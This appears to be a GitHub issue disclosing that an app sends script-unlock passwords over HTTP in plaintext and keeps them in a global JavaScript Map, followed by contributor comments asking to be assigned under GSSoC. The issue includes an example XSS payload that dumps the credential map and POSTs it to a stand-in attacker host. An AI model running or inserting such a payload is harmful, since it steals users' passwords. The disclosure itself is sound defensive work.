Security Vulnerability: Plaintext Transmission and Client-Side Storage of Passwords

[ArshVermaGit]

Description

The application transmits and stores script unlock passwords insecurely across two critical surfaces:

1. Plaintext Network Transmission

Script unlock passwords are sent to the server as plain text within JSON request bodies (e.g., {"password": "..."}) over HTTP. Since the application is commonly served over unencrypted HTTP (typical for local/dev tools), these credentials can be trivially intercepted by any attacker with network visibility (e.g., via packet sniffing, ARP spoofing, or a compromised router on a shared network).

2. Persistent Client-Side Memory Storage

Passwords for unlocked scripts are stored in a frontend JavaScript Map object (unlockCredentials) for the duration of the browser session. This in-memory credential cache is globally accessible from any JavaScript context running on the page.

Attack Vector

1. Network Interception: An attacker on the same network monitors HTTP traffic and captures the plaintext password field from API requests to /api/scripts/run or /api/scripts/lock.
2. XSS-Based Exfiltration: If a DOM-Based XSS vulnerability exists (or is introduced), a malicious script can trivially read the unlockCredentials map and exfiltrate every password the user has entered during their session — effectively compromising all locked scripts at once.

// Example XSS payload that exfiltrates all stored passwords
const stolen = Object.fromEntries(unlockCredentials);
fetch('https://attacker.com/collect', {
    method: 'POST',
    body: JSON.stringify(stolen)
});

[ArshVermaGit]

Hi @siddu-k ! I’ve worked on this issue and opened PR #149 . Please review it, assign this issue to me, and merge the PR under GSSoC. Thanks!

[sanudking]

Hello @siddu-k! I'd like to contribute to this issue. I'm a GSSoC 2026 contributor with skills in Javascript. Would you assign this to me? I'll keep you updated on progress.